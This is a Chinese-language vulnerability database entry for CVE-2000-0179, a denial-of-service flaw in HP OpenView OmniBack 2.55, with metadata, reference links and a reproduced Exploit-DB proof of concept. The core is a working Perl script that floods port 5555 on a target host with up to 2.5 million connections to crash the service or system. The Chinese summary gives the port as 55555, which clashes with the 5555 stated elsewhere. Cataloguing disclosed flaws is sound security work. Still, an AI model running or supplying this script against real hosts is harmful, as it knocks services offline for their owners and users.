HP OpenView OmniBack拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1105729 漏洞类型 未知
发布时间 2000-02-28 更新时间 2005-05-02
CVE编号 CVE-2000-0179 CNNVD-ID CNNVD-200002-077
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/19782
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200002-077
|漏洞详情
HPOpenViewOmniBack2.55版本存在漏洞。远程攻击者借助大量的55555端口连接导致拒绝服务。
|漏洞EXP
source: http://www.securityfocus.com/bid/1015/info

Multiple open connections to port 5555 can cause the HP OpenView OmniBack program to crash by consuming 100% CPU cycles. Closing the connections will not alleviate this problem, therefore a manual restart would be required.


#!/usr/bin/perl
#
# Jon Hittner
# Raise the memory size for omnilnet until Windows NT crashes
# Test against NT4.0 SP5 , NT3.51 , Winframe 1.7 SP5b , Winframe 1.8
# Probably needs to be run several times to crash the system depending
# on the amount of memory in the system.
# This code was written to demo a problem, and I take no respoablity on how
# it's used

use strict; use Socket;

my($y,$h,$p,$in_addr,$proto,$addr);

$h = "$ARGV[0]"; $p = 5555 if (!$ARGV[1]);
if (!$h) { print "A hostname must be provided. Ex: www.domain.com\n"; }

$in_addr = (gethostbyname($h))[4]; $addr = sockaddr_in($p,$in_addr);
$proto = getprotobyname('tcp');
print "TESTING: $h:$p\n";
for ($y=1 ; $y<2500000 ; $y++) {
	socket(S, AF_INET, SOCK_STREAM, $proto);
	connect(S,$addr) or next;
	select S;
	$| = 1;
	select STDOUT;
	send S,"OMNIBACK HAS SOME BIG ISSUES",0;
	}
print "ATTACK COMPLETED!\n";
|参考资料

来源:BID
名称:1015
链接:http://www.securityfocus.com/bid/1015
来源:HP
名称:HPSBUX0006-115
链接:http://www1.itrc.hp.com/service/cki/docDisplay.do?docId=HPSBUX0006-115
来源:BUGTRAQ
名称:20000228HPOmnibackremoteDoS
链接:http://archives.neohapsis.com/archives/bugtraq/2000-02/0387.html